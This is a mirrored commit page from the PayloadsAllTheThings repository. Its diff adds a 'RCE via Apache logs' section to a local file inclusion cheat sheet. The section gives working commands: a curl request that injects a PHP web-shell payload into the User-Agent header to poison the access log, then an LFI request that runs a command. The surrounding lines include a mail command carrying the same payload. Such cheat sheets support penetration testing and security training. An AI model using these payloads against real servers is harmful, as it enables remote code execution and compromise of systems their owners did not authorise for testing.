mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Merge pull request #362 from noraj/patch-1
add RCE via Apache logs in log poisoning
This commit is contained in:
commit
4ae6982f63
@ -345,6 +345,22 @@ In some cases you can also send the email with the `mail` command line.
|
||||
mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null
|
||||
```
|
||||
|
||||
### RCE via Apache logs
|
||||
|
||||
Poison the User-Agent in access logs:
|
||||
|
||||
```
|
||||
$ curl http://example.org/ -A "<?php system(\$_GET['cmd']);?>"
|
||||
```
|
||||
|
||||
Note: The logs will escape double quotes so use single quotes for strings in the PHP payload.
|
||||
|
||||
Then request the logs via the LFI and execute your command.
|
||||
|
||||
```
|
||||
$ curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id
|
||||
```
|
||||
|
||||
## LFI to RCE via PHP sessions
|
||||
|
||||
Check if the website use PHP Session (PHPSESSID)
|
||||
|
Loading…
Reference in New Issue
Block a user